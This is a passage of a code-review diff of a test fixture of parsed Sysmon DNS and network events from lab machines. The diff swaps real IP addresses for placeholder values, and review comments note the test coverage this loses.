Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:172.217.12.195;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802768300Z'/\u003e\u003cEventRecordID\u003e125\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.581\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.pki.goog\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pki-goog.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -8146,7 +8060,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741638600Z", + "ingested": "2021-12-09T13:50:23.457013Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e12\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.255\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8214,12 +8128,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { 
@@ -8235,13 +8149,13 @@ "googleads4.g.doubleclick.net" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741647300Z", + "ingested": "2021-12-09T13:50:23.457018700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029828800Z'/\u003e\u003cEventRecordID\u003e126\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.872\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads4.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", 
@@ -8323,7 +8237,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741655800Z", + "ingested": "2021-12-09T13:50:23.457024700Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e13\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8391,27 +8305,27 @@ "type": "CNAME" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.2.2", - "151.101.66.2", - "151.101.130.2", - "151.101.194.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
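Review bot: The four A records for images.taboola.com all carry `"data": "89.160.20.156"` now, so `resolved_ip` repeats one address four times and, in the next hunk, `related.ip` shrinks to a single entry; the fixture no longer demonstrates that the pipeline keeps several distinct answers or that the `related.ip` de-duplication is collapsing genuine duplicates rather than hiding a dropped answer. The earlier ocsp.pki.goog hunk avoids this by mapping each original address to its own `192.168.x.30` value, and the same approach would work here, e.g. `"data": "192.168.2.2"`, `"data": "192.168.66.2"` and so on, with `resolved_ip` and the `QueryResults` inside `event.original` (and therefore the raw input log) changed to match — assuming those private addresses are part of the allowed set the changelog refers to. If only the single public address is accepted by the tooling, a sentence in the PR description saying the multi-answer case is intentionally uncovered would save the next regeneration from re-introducing it by accident.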
@@ -8427,16 +8341,13 @@ "images.taboola.com" ], "ip": [ - "151.101.2.2", - "151.101.66.2", - "151.101.130.2", - "151.101.194.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741660400Z", + "ingested": "2021-12-09T13:50:23.457030600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.2.2;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029851300Z'/\u003e\u003cEventRecordID\u003e127\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.889\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimages.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", 
@@ -8512,7 +8423,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741666500Z", + "ingested": "2021-12-09T13:50:23.457036400Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e14\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003efe80:0:0:0:e488:b85c:5262:ff86\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003eff02:0:0:0:0:0:1:3\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8564,15 +8475,15 @@ }, "destination": { "port": 5355, - "ip": "e000:fc:4300:6800:7200:6f00:6d00:6500" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 55542, - "ip": "a00:20f:0:0:18a2:6e00:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "llmnr", - "community_id": "1:sejGGvgk92xTvKdzlFitndKqdWw=", + "community_id": "1:zjVE29ipqvMTvzEUbTYQ6tGBM08=", "transport": "udp", "type": "ipv6", "direction": "egress" 
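Review bot: `source.ip` and `destination.ip` in this hunk are now the same value, `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6`, and the NetBIOS events at the `@@ -8642` and `@@ -8720` hunks and the LLMNR event at `@@ -8878` do the same with `89.160.20.156`; with identical endpoints the expected output can no longer catch a regression that swaps `SourceIp`/`DestinationIp` or attaches `network.direction` to the wrong endpoint. The `community_id` values do not cover that gap either, since Community ID is symmetric — the old side of the `@@ -8642`/`@@ -8720` pair already shows the same id for the egress and ingress events. Keeping two distinct addresses per flow, e.g. `"ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"` for the source and a second address from the allowed set for the destination (only one IPv6 value appears in this diff, so that may need checking against the tooling's list), would preserve the check and bring `related.ip` in the following hunk back to two entries.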
@@ -8586,14 +8497,13 @@ "NETWORK SERVICE" ], "ip": [ - "a00:20f:0:0:18a2:6e00:e0:ffff", - "e000:fc:4300:6800:7200:6f00:6d00:6500" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741672800Z", + "ingested": "2021-12-09T13:50:23.457042300Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData 
Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:4300:6800:7200:6f00:6d00:6500\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e15\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData 
Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55542\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8642,15 +8552,15 @@ }, "destination": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "source": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "network": { "protocol": "netbios-ns", - "community_id": "1:yP71IXofOTWmF1LG760//yXa4Rk=", + "community_id": "1:fbQ9BbXiy01VWluiIQp2GM9FUAU=", "transport": "udp", "type": "ipv4", "direction": "egress" 
@@ -8664,14 +8574,13 @@ "SYSTEM" ], "ip": [ - "169.254.180.25", - "169.254.255.255" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741679900Z", + "ingested": "2021-12-09T13:50:23.457048100Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData 